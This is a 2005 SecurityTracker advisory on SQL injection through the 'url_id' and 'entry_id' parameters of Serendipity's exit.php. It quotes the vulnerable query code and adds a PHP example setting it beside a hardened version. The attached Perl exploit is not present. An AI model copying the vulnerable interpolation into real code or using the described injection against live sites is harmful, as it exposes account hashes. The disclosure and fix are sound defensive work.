SecurityTracker Archives
Category:   Application (Forum/Board/Portal)  >   Serendipity
Vendors:   s9y.org
Serendipity Input Validation Error in 'exit.php' Permits SQL Injection Attacks
SecurityTracker Alert ID:  1013699
SecurityTracker URL:  http://securitytracker.com/id/1013699
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Apr 14 2005
Impact:   Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Version(s): 0.8beta4
Description:   An input validation vulnerability was reported in Serendipity. A remote user can inject SQL commands.

The 'exit.php' script does not properly validate user-supplied input in the 'url_id' and 'entry_id' parameters. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database.

ADZ Security Team reported this vulnerability.

Impact:   A remote user can execute SQL commands on the underlying database.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.s9y.org/
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.
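The query in 'exit.php' interpolates the raw 'url_id' and 'entry_id' request values into the SQL string and then echoes whatever the query returns in a Location header. The following PHP is an added example, not Serendipity's own code or patch: it shows the vulnerable string-building pattern beside a hardened equivalent that admits only canonical integers, binds them as parameters, and emits a redirect only when a link was actually found. Table and column names follow the advisory (dbPrefix + "references"; columns id, entry_id, link); the helper names, the SQLite demo table and the sample inputs are constructed for the example.

```php
<?php
// Added example (not Serendipity's own code): the vulnerable pattern from
// exit.php beside a hardened equivalent. Helper names are hypothetical;
// table/column names follow the advisory.

declare(strict_types=1);

// Vulnerable pattern: request values are interpolated straight into SQL.
// Shown only to make visible what reaches the database; never executed here.
function build_exit_query_unsafe(array $get, string $dbPrefix): string
{
    return "SELECT link FROM {$dbPrefix}references WHERE id = {$get['url_id']} "
         . "AND entry_id = {$get['entry_id']}";
}

// Hardened step 1: accept only a canonical positive integer string.
// Rejects '', '01', '1e3', '1 x' and anything else that is not plain digits.
function parse_id(array $get, string $name): ?int
{
    if (!isset($get[$name]) || !is_string($get[$name])) {
        return null;
    }
    $v = $get[$name];
    if ($v === '' || !ctype_digit($v) || ($v[0] === '0' && strlen($v) > 1)) {
        return null;
    }
    if (strlen($v) > 18) {   // keep the (int) cast well inside PHP_INT_MAX
        return null;
    }
    return (int) $v;
}

// Hardened step 2: bind the values so the database never parses them as SQL.
function lookup_exit_link(PDO $db, array $get, string $dbPrefix): ?string
{
    $urlId   = parse_id($get, 'url_id');
    $entryId = parse_id($get, 'entry_id');
    if ($urlId === null || $entryId === null) {
        return null;   // treated exactly like "no such link"
    }
    $stmt = $db->prepare(
        "SELECT link FROM {$dbPrefix}references WHERE id = :id AND entry_id = :entry_id"
    );
    $stmt->bindValue(':id', $urlId, PDO::PARAM_INT);
    $stmt->bindValue(':entry_id', $entryId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return ($row !== false && isset($row['link'])) ? (string) $row['link'] : null;
}

// Hardened step 3: only send a Location header for a link that was found.
// A failed lookup must not echo anything derived from the request.
function exit_redirect(PDO $db, array $get, string $dbPrefix): array
{
    $url = lookup_exit_link($db, $get, $dbPrefix);
    if ($url === null) {
        return ['status' => 404, 'headers' => []];
    }
    return ['status' => 301, 'headers' => ['Location: ' . $url]];
}

// Constructed demo data in an in-memory SQLite database (requires pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE serendipity_references (id INTEGER, entry_id INTEGER, link TEXT)');
$db->exec("INSERT INTO serendipity_references VALUES (7, 3, 'http://example.com/')");

$good = ['url_id' => '7', 'entry_id' => '3'];
$bad  = ['url_id' => '7 x', 'entry_id' => '3'];   // constructed non-numeric input

echo build_exit_query_unsafe($bad, 'serendipity_'), PHP_EOL;   // raw text lands in the SQL
print_r(exit_redirect($db, $good, 'serendipity_'));           // status 301 with Location
print_r(exit_redirect($db, $bad, 'serendipity_'));            // status 404, no header
```

The integer check and the bound parameters each close the injection on their own; keeping both means a later refactor that drops one still leaves the other in place. Returning 404 on a failed lookup also removes the disclosure channel the advisory describes, where query output was reflected into the Location header.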


 Source Message Contents

Subject:  serendipity SQL Injection vulnerability


This is a multi-part message in MIME format.

--Multipart=_Wed__13_Apr_2005_20_22_05_+0400_d.JEscg.7oMaye=.
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit

ADZ Security Team
===================
Info

Program: serendipity web blog system
Version: 0.8beta4
Module:  exit.php
Bug type: SQL Injection
Vendor site: http://www.s9y.org/
Vendor Informed: Yes
===================
Bug Info

// code start
//.......
// $_GET['url_id'] and $_GET['entry_id'] are interpolated into the SQL string as-is
$links = serendipity_db_query("SELECT link FROM
{$serendipity['dbPrefix']}references WHERE id = {$_GET['url_id']} AND
entry_id = {$_GET['entry_id']}", true);
//.......
// no checks here...
//.......
if (is_array($links) && isset($links['link'])) {
    // URL is valid. Track it.
    $url = $links['link'];
}
//......
// whatever the query returned is echoed back in the Location header
if (serendipity_isResponseClean($url)) {
    header('HTTP/1.0 301 Moved Permanently');
    header('Location: ' . $url);
}
//......
// code end

As we see, if we insert some "bad" SQL code into $_GET['url_id'] or
$_GET['entry_id'], the server returns a "Location: xxxx" header, which
may contain an account login/passwd hash :)
Sorry for my English :)

Exploit/PoC:
See exploit in attached adz_serendipity.pl

===================
Contact

ADZ Security Team
URL: http://adz.void.ru/
IRC: #adz @ QuakeNet
MAIL: kre0n@mail.ru, adz.kreon@gmail.com (for non-russian users)



--Multipart=_Wed__13_Apr_2005_20_22_05_+0400_d.JEscg.7oMaye=.
Content-Type: application/octet-stream;
 name="adz_serendipity.pl"
Content-Disposition: attachment;
 filename="adz_serendipity.pl"
Content-Transfer-Encoding: base64
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--Multipart=_Wed__13_Apr_2005_20_22_05_+0400_d.JEscg.7oMaye=.--